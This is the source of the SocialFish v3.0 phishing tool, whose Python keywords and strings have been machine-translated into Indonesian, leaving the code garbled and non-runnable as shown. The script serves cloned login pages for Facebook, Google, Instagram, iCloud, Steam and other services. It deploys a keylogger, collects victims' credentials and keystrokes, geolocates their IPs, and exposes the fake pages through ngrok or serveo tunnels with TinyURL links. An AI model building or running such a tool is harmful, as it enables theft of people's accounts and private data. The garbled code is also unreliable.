# ! / usr / bin / python3
# - * - coding: utf-8 - * -
#    SOCIALFISH v3.0
#      by: An0nUD4Y
#
# ##########################
dari waktu impor tidur
dari sys import stdout, exit , argv
dari sistem impor os , path
dari distutils.dir_util import copy_tree
impor multi proses
dari urllib.request impor urlopen, kutipan, tanda kutip
dari platform sistem impor sebagai systemos, arsitektur
dari download impor wget
impor ulang
impor json
dari impor subprocess check_output


MERAH , PUTIH , SIPAN , HIJAU , DEFAULT  =  ' \ 033 [91m ' , ' \ 033 [46m ' , ' \ 033 [36m ' , ' \ 033 [1; 32m ' ,   ' \ 033 [0m '

def  terhubung ( host = ' http://duckduckgo.com ' ): # Memeriksa koneksi jaringan.
    coba :
        urlopen (tuan rumah)
        mengembalikan  True
    kecuali :
        mengembalikan  False
jika terhubung () ==  Salah : # Jika tidak ada jaringan
     cetak ( '' '
  ....._____....... ____ ____ ____ _ ____ _ ____ _ ____ _ _
      / \ / | [__ | | | | | __ | | | ___ | [__ | __ |
      \ o__ / \ | ___] | __ | | ___ | | | | ___ | | ___] | |
          \ |
                    {0} [ {1} ! {0} ] {1} Kesalahan jaringan. Verifikasi koneksi Anda. \ n
'' ' .format ( RED , DEFAULT ))
     keluar ( 0 )

def  checkNgrok (): # Periksa apakah pengguna sudah memiliki server Ngrok, jika False - mengunduhnya.
    if path.isfile ( ' Server / ngrok ' ) ==  Salah :
        print ( ' [*] Mengunduh Ngrok ... ' )
        jika  ' Android '  in  str (check_output (( ' uname ' , ' -a ' ))):
            filename =  ' ngrok-stable-linux-arm.zip '
        lain :
            ostype = systemos (). lower ()
            if architecture () [ 0 ] ==  ' 64bit ' :
                filename =  ' ngrok-stable- {0} -amd64.zip ' .format (ostype)
            lain :
                filename =  ' ngrok-stable- {0} -386.zip ' .format (ostype)
        url =  ' https://bin.equinox.io/c/4VmDzA7iaHb/ '  + nama file
        unduh (url)
        sistem ( ' unzip '  + nama file)
        sistem ( ' mv ngrok Server / ngrok ' )
        sistem ( ' rm -Rf '  + nama file)
        sistem ( ' jelas ' )
checkNgrok ()

def  end (): # Pesan saat SocialFish keluar
 sistem ( ' jelas ' )
    cetak ( '' '
                   SOSIAL {2}
              | \ \ \ \ \ \ \ \ __ ___
              | \ \ \ \ \ \ \ \ | | O ~ -_ _- ~~ ~~ -_
              | > ---- | - | - | - | - | - | - | __ / /    {1} JANGAN {2}    )
              | / / / / / / / | __ \ <      {1} FORGET {2}    )
              | / / / / / / / / \ _    {1} AKU! {2}   _)
                          {1} IKAN {2}                 ~ --___-- ~
               {0} SEKARANG DENGAN INFORMASI SERANGAN VICTIM LANGSUNG]
          {0} KEYLOGGER DITAWARKAN UNTUK ANDA, UNTUK MENGAMBIL SETIAP KEYSTROKE]
   [ {0} Beberapa halaman phising lainnya telah ditambahkan dalam skrip. Untuk Serangan yang lebih baik]
[ {0} SELAMAT DATANG DI SOCIALFISH V3.0 oleh-An0nUD4Y] \ n  {1} '' ' .format ( GREEN , DEFAULT , CYAN ))

def  loadModule ( modul ):
       cetak ( '' ' {0}
   _.- = -._ .-,
. ' "-., '/
(AnonUD4Y _. <
`= .____. =" `._ \\
[ {1} * {0} ] {1}  % s modul dimuat. Situs membangun ... {0} ''' .format ( CYAN , DEFAULT ) % modul)

def  runPhishing ( halaman , option2 ): # Menu pemilihan halaman phishing
    sistem ( ' rm -Rf Server / www /*.* && sentuh Server / www / nama pengguna.txt && sentuh Server / www / ip.txt && cp Halaman Web / ip.php Server / www / && cp WebPages / KeyloggerData.txt Server / www / && cp WebPages / keylogger.js Server / www / && cp WebPages / keylogger.php Server / www / ' )
    jika option2 ==  ' 1 '  dan halaman ==  ' Facebook ' :
        copy_tree ( " Halaman Web / fb_standard / " , " Server / www / " )
    jika option2 ==  ' 2 '  dan halaman ==  ' Facebook ' :
        copy_tree ( " Halaman Web / fb_advanced_poll / " , " Server / www / " )
    jika option2 ==  ' 3 '  dan halaman ==  ' Facebook ' :
        copy_tree ( " Halaman Web / fb_security_fake / " , " Server / www / " )
    jika option2 ==  ' 4 '  dan halaman ==  ' Facebook ' :
        copy_tree ( " Halaman Web / fb_messenger / " , " Server / www / " )
    elif option2 ==  ' 1 '  dan halaman ==  ' Google ' :
        copy_tree ( " Halaman Web / google_standard / " , " Server / www / " )
    elif option2 ==  ' 2 '  dan halaman ==  ' Google ' :
        copy_tree ( " WebPages / google_advanced_poll / " , " Server / www / " )
    elif option2 ==  ' 3 '  dan halaman ==  ' Google ' :
        copy_tree ( " Halaman Web / google_advanced_web / " , " Server / www / " )
    halaman elif ==  ' LinkedIn ' :
        copy_tree ( " Halaman Web / linkedin / " , " Server / www / " )
    halaman elif ==  ' GitHub ' :
        copy_tree ( " Halaman Web / GitHub / " , " Server / www / " )
    halaman elif ==  ' StackOverflow ' :
        copy_tree ( " Halaman Web / stackoverflow / " , " Server / www / " )
    halaman elif ==  ' WordPress ' :
        copy_tree ( " Halaman Web / wordpress / " , " Server / www / " )
    halaman elif ==  ' Twitter ' :
        copy_tree ( " Halaman Web / twitter / " , " Server / www / " )
    halaman elif ==  ' Snapchat ' :
        copy_tree ( " Halaman Web / Snapchat_web / " , " Server / www / " )
    halaman elif ==  ' Yahoo ' :
        copy_tree ( " Halaman Web / yahoo_web / " , " Server / www / " )
    halaman elif ==  ' Kedutan ' :
        copy_tree ( " Halaman Web / kedutan / " , " Server / www / " )
    halaman elif ==  ' Microsoft ' :
        copy_tree ( " Halaman Web / live_web / " , " Server / www / " )
    halaman elif ==  ' Steam ' :
        copy_tree ( " Halaman Web / steam / " , " Server / www / " )
    halaman elif ==  ' iCloud ' :
        copy_tree ( " Halaman Web / iCloud / " , " Server / www / " )
    elif option2 ==  ' 1 '  dan halaman ==  ' Instagram ' :
        copy_tree ( " Halaman Web / Instagram_web / " , " Server / www / " )
    elif option2 ==  ' 2 '  dan halaman ==  ' Instagram ' :
        copy_tree ( " Halaman Web / Instagram_autoliker / " , " Server / www / " )
    elif option2 ==  ' 1 '  dan halaman ==  ' VK ' :
        copy_tree ( " Halaman Web / VK / " , " Server / www / " )
    elif option2 ==  ' 2 '  dan halaman ==  ' VK ' :
        copy_tree ( " Halaman Web / VK_poll_method / " , " Server / www / " )


didBackground =  Benar
logFile =  Tidak Ada
untuk arg in argv:
    if arg == " --nolog " : # Jika benar - jangan login
        didBackground =  Salah
jika didackback:
    logFile =  open ( " log.txt " , " w " )


def  log ( ctx ): # Menulis log
    if didBackground: # if didBackground == Benar, tulis
        logFile.write (ctx.replace ( RED , " " ) .replace ( WHITE , " " ) .replace ( CYAN , " " ) .replace ( GREEN , " " ) .replace ( DEFAULT , " " ) +  " \ n " )
    cetak (ctx)


def  waitCreds ():
    print ( " {0} [ {1} * {0} ] {1} Hai Hacker Semuanya telah selesai .............. Mulai Mengecek " .format ( RED , DEFAULT ))

    cetak ( '' ' {0}
   _.- = -._ .-,
. ' "-., '/
(AnonUD4Y_ ~. <
`= .____. =" `._ \\
[ {1} * {0} ] {1} KAMI JUGA MENYIMPAN KEYLOGGER. .
[ {1} * {0} ] {1} ANDA AKAN MENDAPATKAN INFO PERANGKAT VICTIM. {0} ''' .format ( CYAN , DEFAULT ))

    print ( "  {0} [ {1} * {0} ] {1} Menunggu kredensial // Kunci yang ditekan // Info perangkat korban ... \ n " .format ( RED , DEFAULT ))
    sementara  Benar :
        dengan  open ( ' Server / www / usernames.txt ' ) sebagai kredit:
            lines = creds.read (). rstrip ()
            jika  len (baris) ! =  0 :
                log ( ' =============================================== ======================= ' .format ( RED , DEFAULT ))
                log ( '  {0} [CREDENTIALS FOUND] {1} : \ n  {0} % s {1} ' .format ( GREEN , DEFAULT ) % baris)
                sistem ( ' rm -rf Server / www / usernames.txt && sentuh Server / www / usernames.txt ' )
                log ( ' =============================================== ======================= ' .format ( RED , DEFAULT ))
                log ( '  {0} ***** HARAP ANDA MENIKMATI. SEHINGGA MEMBUATNYA LEBIH POPULER ***** {1} \ n  {0} {1} ' .format ( RED , DEFAULT ))

        creds.close ()


        dengan  open ( ' Server / www / ip.txt ' ) sebagai kredit:
            lines = creds.read (). rstrip ()
            jika  len (baris) ! =  0 :
                ip = re.match ( ' IP Publik Korban: (. *?) \ n ' , baris) .group ( 1 )
                resp = urlopen ( ' https://ipinfo.io/% s / json '  % ip)
                ipinfo = json.loads (resp.read (). decode (resp.info (). get_param ( ' charset ' ) atau  ' utf-8 ' ))
                jika  ' bogon '  di ipinfo:
                    log ( ' =============================================== ======================= ' .format ( RED , DEFAULT ))
                    log ( '  \ n {0} [VICTIM IP BONUS] {1} : \ n  {0} % s {1} ' .format ( GREEN , DEFAULT ) % baris)
                lain :
                    matchObj = re.match ( ' ^ (. *?), (. *) $ ' , ipinfo [ ' loc ' ])
                    latitude = matchObj.group ( 1 )
                    bujur = matchObj.group ( 2 )
                    log ( ' =============================================== ======================= ' .format ( RED , DEFAULT ))
                    log ( '  \ n {0} [VICTIM INFO FOUND] {1} : \ n  {0} % s {1} ' .format ( GREEN , DEFAULT ) % baris)
                    log ( '  \ n {0} Bujur: % s  \ n Lintang: % s {1} ' .format ( GREEN , DEFAULT ) % (bujur, lintang))
                    log ( '  \ n {0} ISP: % s  \ n Negara: % s {1} ' .format ( GREEN , DEFAULT ) % (ipinfo [ ' org ' ], ipinfo [ ' country ' ])))
                    log ( '  \ n {0} Wilayah: % s  \ n Kota: % s {1} ' .format ( GREEN , DEFAULT ) % (ipinfo [ ' wilayah ' ], ipinfo [ ' kota ' ]))
                sistem ( ' rm -rf Server / www / ip.txt && sentuh Server / www / ip.txt ' )
                log ( ' =============================================== ======================= ' .format ( RED , DEFAULT ))

        creds.close ()

        dengan  open ( ' Server / www / KeyloggerData.txt ' ) sebagai kredit:
            lines = creds.read (). rstrip ()
            jika  len (baris) ! =  0 :
                log ( ' ______________________________________________________________________________ ' .format ( RED , DEFAULT ))
                log ( '  {0} [MENDAPATKAN KUNCI PRESSED] {1} : \ n  {0} % s {1} ' .format ( GREEN , DEFAULT ) % baris)
                sistem ( ' rm -rf Server / www / KeyloggerData.txt && sentuh Server / www / KeyloggerData.txt ' )
                log ( ' ______________________________________________________________________________ ' .format ( RED , DEFAULT ))


        creds.close ()
        
        
        def  runPEnv (): # menu tempat pengguna memilih apa yang ingin mereka gunakan
    sistem ( ' jelas ' )
    print ( '' '            {2} - {1} An0nUD4Y {2} | {1} An0nUD4Y {2} | {1} An0nUD4Y {2} - INDIA
                       . . .
                 . ' ''
             '' '' '
  ███████ ████████ ███████ ██ ███████ ██ ███████ ██ ███████ █ █ ██
  ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
  ███████ ██ ██ ██ ██ ███████ ██ █████ █████ ██ ███████
       ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
  ███████ ████████ ███████ ██ ██ ██ ███████ ██ ██ ██ ███████ ██ ██
      . '' .... '..'. '
         ' . '' '   {1} v3.0 {2}
               ' . . . . ' . ' '
                   '' '   {1} Updated_By -> AnonUD4Y_ {2}
 _________________________________________________________________________________
          {0} [SEKARANG DENGAN INFORMASI SERUAN VICTIM LANGSUNG]
          {0} KEYLOGGER AKAN DITAWARKAN UNTUK ANDA, UNTUK MENGAMBIL SETIAP KEYSTROKE]
 _________________________________________________________________________________
                             {1} '' ' .format ( GREEN , DEFAULT , CYAN ))

    untuk saya dalam  kisaran ( 101 ):
        tidur ( 0,01 )
        stdout.write ( " \ r {0} [ {1} * {0} ] {1} Mempersiapkan lingkungan ... % d %% " .format ( CYAN , DEFAULT ) % i)
        stdout.flush ()

    mencetak ( " \ n \ n {0} [ {1} * {0} ] {1} Mencari instalasi PHP ... " .format ( CYAN , DEFAULT ))
    if  256  ! = system ( ' which php ' ): # Memeriksa apakah pengguna memiliki PHP
        mencetak ( " - {0} > {1} . OK " .format ( CYAN , DEFAULT ))
    lain :
        print ( " - {0} > {1} PHP TIDAK DITEMUKAN: \ n  {0} * {1} Silakan instal PHP dan jalankan saya lagi.http: //www.php.net/ " .format ( RED , DEFAULT ))
        keluar ( 0 )
    jika  input ( "  {0} [ {1} ! {0} ] {1} Apakah Anda setuju untuk menggunakan alat ini hanya untuk tujuan pendidikan? (y / n) \ n  {2} SF-An0nUD4Y> {1} " . format ( RED , DEFAULT , CYAN )). upper () ! =  ' Y ' : # Pertanyaan di mana pengguna harus menerima tujuan pendidikan
        sistem ( ' jelas ' )
        print ( ' \ n [ {0} ANDA TIDAK BERWENANG UNTUK MENGGUNAKAN ALAT INI. ANDA MEMBUTUHKAN PIKIRAN YANG BAIK DAN JIWA MENJADI SALAH SATU DARI AS. MENDAPATKAN JAUH DARI SINI DAN TIDAK DATANGKAN KEMBALI DENGAN MOTIF YANG SAMA. BAIK DATANG! {1}} ] \ n ' .format ( RED , DEFAULT ))
        keluar ( 0 )
    option =  input ( " \ n Pilih opsi: \ n \ n  {0} [ {1} 1 {0} ] {1} Facebook \ n \ n  {0} [ {1} 2 {0} ] {1} Google \ n \ n  {0} [ {1} 3 {0} ] {1} LinkedIn \ n \ n  {0} [ {1} 4 {0} ] {1} GitHub \ n \ n  {0} [ { 1} 5 {0} ] {1} StackOverflow\ n \ n  {0} [ {1} 6 {0} ] {1} WordPress \ n \ n  {0} [ {1} 7 {0} ] {1} Twitter \ n \ n  {0} [ {1 } 8 {0} ] {1} Instagram \ n \ n  {0} [ {1} 9 {0} ] {1} Snapchat \ n \ n  {0} [ {1} 10 {0} ] {1} Yahoo \ n \ n  {0} [ {1} 11 {0} ] {1}Kedutan \ n \ n  {0} [ {1} 12 {0} ] {1} Microsoft \ n \ n  {0} [ {1} 13 {0} ] {1} Uap \ n \ n  {0} [ { 1} 14 {0} ] {1} VK \ n \ n  {0} [ {1} 15 {0} ] {1} iCloud \ n \ n  {0} [ {1} -----> {0 } ] {1} Script Phising Lainnya SEGERA DATANG! TINGGAL DISESUAIKAN DENGAN An0nUD4Y! \ n \ n  {0}SF-An0nUD4Y>   {1} " .format ( CYAN , DEFAULT ))
    jika opsi ==  ' 1 ' :
        loadModule ( ' Facebook ' )
        option2 =  input ( " \ n Mode operasi: \ n \ n  {0} [ {1} 1 {0} ] {1} Phishing Halaman Standar \ n \ n  {0} [ {1} 2 {0} ] {1 } Metode Pemeringkatan Phishing-Poll Tingkat Lanjut (Poll_mode / login_with) \ n \ n  {0} [ {1} 3 {0} ] {1} Masalah Keamanan Palsu Phishing Facebook (security_mode) \ n \ n  {0} [ {1 } 4 {0} ] {1}Kredensial Messenger Phising Facebook (messenger_mode) \ n \ n  {0} [ {1} -----> {0} ] {1} Script Phising Lainnya SEGERA! TETAP DISINI ! \ n \ n  {0} SF-An0nUD4Y> {1} " .format ( CYAN , DEFAULT ))
        runPhishing ( ' Facebook ' , option2)
    opsi elif ==  ' 2 ' :
        loadModule ( ' Google ' )
        option2 =  input ( " \ n Mode operasi: \ n \ n  {0} [ {1} 1 {0} ] {1} Phishing Halaman Standar \ n \ n  {0} [ {1} 2 {0} ] {1 } Advanced Phishing (poll_mode / login_with) \ n \ n  {0} [ {1} 3 {0} ] {1} Web Google Baru \ n \ n  {0} [ {1} -----> {0} ] {1} Script Phising Lainnya SEGERA! TINGGALKAN TUNED! \ N \ n  {0}SF-An0nUD4Y> {1} " .format ( CYAN , DEFAULT ))
        runPhishing ( ' Google ' , option2)
    opsi elif ==  ' 3 ' :
        loadModule ( ' LinkedIn ' )
        option2 =  ' '
        runPhishing ( ' LinkedIn ' , option2)
    opsi elif ==  ' 4 ' :
        loadModule ( ' GitHub ' )
        option2 =  ' '
        runPhishing ( ' GitHub ' , option2)
    opsi elif ==  ' 5 ' :
        loadModule ( ' StackOverflow ' )
        option2 =  ' '
        runPhishing ( ' StackOverflow ' , option2)
    opsi elif ==  ' 6 ' :
        loadModule ( ' WordPress ' )
        option2 =  ' '
        runPhishing ( ' WordPress ' , option2)
    opsi elif ==  ' 7 ' :
        loadModule ( ' Twitter ' )
        option2 =  ' '
        runPhishing ( ' Twitter ' , option2)
    opsi elif ==  ' 8 ' :
        loadModule ( ' Instagram ' )
        option2 =  input ( " \ n Mode operasi: \ n \ n  {0} [ {1} 1 {0} ] {1} Halaman Web Instagram Standar Phishing \ n \ n  {0} [ {1} 2 {0} ] {1} Instagram Autoliker Phising (Setelah mengirim pengalihan ke autoliker asli) \ n \ n  {0} [ {1} -------------> {0} ] {1} Script Phising Lainnya DATANG SEGERA! menantikan! \ n \ n  {0} SF-An0nUD4Y> {1} " .format ( CYAN ,DEFAULT ))
        runPhishing ( ' Instagram ' , option2)
    opsi elif ==  ' 9 ' :
        loadModule ( ' Snapchat ' )
        option2 =  ' '
        runPhishing ( ' Snapchat ' , option2)
    opsi elif ==  ' 10 ' :
        loadModule ( ' Yahoo ' )
        option2 =  ' '
        runPhishing ( ' Yahoo ' , option2)
    opsi elif ==  ' 11 ' :
        loadModule ( ' Kedutan ' )
        option2 =  ' '
        runPhishing ( ' Kedutan ' , option2)
    opsi elif ==  ' 12 ' :
        loadModule ( ' Microsoft ' )
        option2 =  ' '
        runPhishing ( ' Microsoft ' , option2)
    opsi elif ==  ' 13 ' :
        loadModule ( ' Steam ' )
        option2 =  ' '
        runPhishing ( ' Steam ' , option2)
    opsi elif ==  ' 14 ' :
        loadModule ( ' VK ' )
        option2 =  input ( " \ n Mode operasi: \ n \ n  {0} [ {1} 1 {0} ] {1} Halaman Web VK Standar Phishing \ n \ n  {0} [ {1} 2 {0} ] {1} Phising Tingkat Lanjut (poll_mode / login_with) \ n \ n  {0} [ {1} -------------> {0} ] {1} Script Phising Lainnya SEGERA DATANG! TETAP TUNED ! \ n \ n  {0} SF-An0nUD4Y> {1} " .format ( CYAN , DEFAULT ))
        runPhishing ( ' VK ' , option2)
    opsi elif ==  ' 15 ' :
        loadModule ( ' iCloud ' )
        option2 =  ' '
        runPhishing ( ' iCloud ' , option2)
    lain :
        keluar ( 0 )



def  runServeo ():
    system ( ' ssh -o StrictHostKeyChecking = no -o ServerAliveInterval = 60 -R 80: localhost: 1111 serveo.net> link.url 2> / dev / null & ' )
    tidur ( 7 )
    output = check_output ( " grep -o 'https: // [0-9a-z] * \. serveo.net' link.url " , shell = True )
    url =  str (output) .strip ( " b '\ n " )
    mencetak ( " \ n  {0} [ {1} * {0} ] {1} SERVEO URL: {2} " .format ( CYAN , DEFAULT , GREEN ) + url +  " {1} " .format ( CYAN , DEFAULT , HIJAU ))
    tautan = check_output ( " curl -s 'http://tinyurl.com/api-create.php?url=' " + url, shell = True ) .decode (). ganti ( ' http ' , ' https ' )
    mencetak ( " \ n  {0} [ {1} * {0} ] {1} TinyURL: {2} " .format ( CYAN , DEFAULT , GREEN ) + Link +  " {1} " .format ( CYAN , DEFAULT , HIJAU ))
    cetak ( " \ n " )

def  runNgrok ():
    system ( ' ./Server/ngrok http 1111> / dev / null & ' )
    sementara  Benar :
        tidur ( 2 )
        system ( ' curl -s -N http://127.0.0.1:4040/status | grep "https: // [0-9a-z] * \. ngrok.io" -oh> ngrok.url ' )
        urlFile =  buka ( ' ngrok.url ' , ' r ' )
        url = urlFile.read ()
        urlFile.close ()
        if re.match ( " https: // [0-9a-z] * \. ngrok.io " , url) ! =  Tidak Ada :
            mencetak ( " \ n  {0} [ {1} * {0} ] {1} Ngrok URL: {2} " .format ( CYAN , DEFAULT , GREEN ) + url +  " {1} " .format ( CYAN , DEFAULT , HIJAU ))
            tautan = check_output ( " curl -s 'http://tinyurl.com/api-create.php?url=' " + url, shell = True ) .decode (). ganti ( ' http ' , ' https ' )
            mencetak ( " \ n  {0} [ {1} * {0} ] {1} TinyURL: {2} " .format ( CYAN , DEFAULT , GREEN ) + Link +  " {1} " .format ( CYAN , DEFAULT , HIJAU ))
            cetak ( " \ n " )
            istirahat


def  runServer ():
    sistem ( " cd Server / www / && php -S 127.0.0.1:1111> / dev / null 2> & 1 & " )

if  __name__  ==  " __main__ " :
    coba :
        runPEnv ()
        def  custom (): # Pertanyaan di mana pengguna dapat memasukkan tautan web kustom
            mencetak ( " \ n  {0} Masukkan redirect kustom url: " .format ( CYAN , DEFAULT ))
            kustom =  masukan ( " \ n  {0} SF-An0nUD4Y> {1} " .format ( CYAN , DEFAULT ))
            jika  ' http: // '  atau  ' https: // '  di custom:
                lulus
            lain :
                custom =  ' http: // '  + custom
            jika path.exists ( ' Server / www / post.php ' ) dan path.exists ( ' Server / www / login.php ' ):
                dengan  open ( ' Server / www / login.php ' ) sebagai f:
                    read_data = f.read ()
                c = read_data.replace ( ' <CUSTOM> ' , custom)
                f =  buka ( ' Server / www / login.php ' , ' w ' )
                f.write (c)
                f.close ()
                dengan  open ( ' Server / www / post.php ' ) sebagai f:
                    read_data = f.read ()
                c = read_data.replace ( ' <CUSTOM> ' , custom)
                f =  buka ( ' Server / www / post.php ' , ' w ' )
                f.write (c)
                f.close ()
            lain :
                dengan  open ( ' Server / www / login.php ' ) sebagai f:
                    read_data = f.read ()
                c = read_data.replace ( ' <CUSTOM> ' , custom)
                f =  buka ( ' Server / www / login.php ' , ' w ' )
                f.write (c)
                f.close ()
        adat()
        def  server (): # Pertanyaan di mana pengguna harus memilih server
                mencetak ( " \ n  {0} Silakan pilih server yang tersedia: {1} " .format ( CYAN , DEFAULT ))
                mencetak ( " \ n  {0} [ {1} 1 {0} ] {1} Ngrok \ n  {0} [ {1} 2 {0} ] {1} Serveo " .format ( CYAN , DEFAULT ))
                Pilihan =  masukan ( "  \ n  {0} SF-An0nUD4Y> {1} " .format ( CYAN , DEFAULT ))
                jika pilihan ==  ' 1 ' :
                    runNgrok ()
                elif choice ==  ' 2 ' :
                    runServeo ()
                lain :
                    sistem ( ' jelas ' )
                    server kembali ()
        server ()
        multiprocessing.Process ( target = runServer) .start ()
        waitCreds ()

    kecuali  KeyboardInterrupt :
        akhir()
        keluar ( 0 )
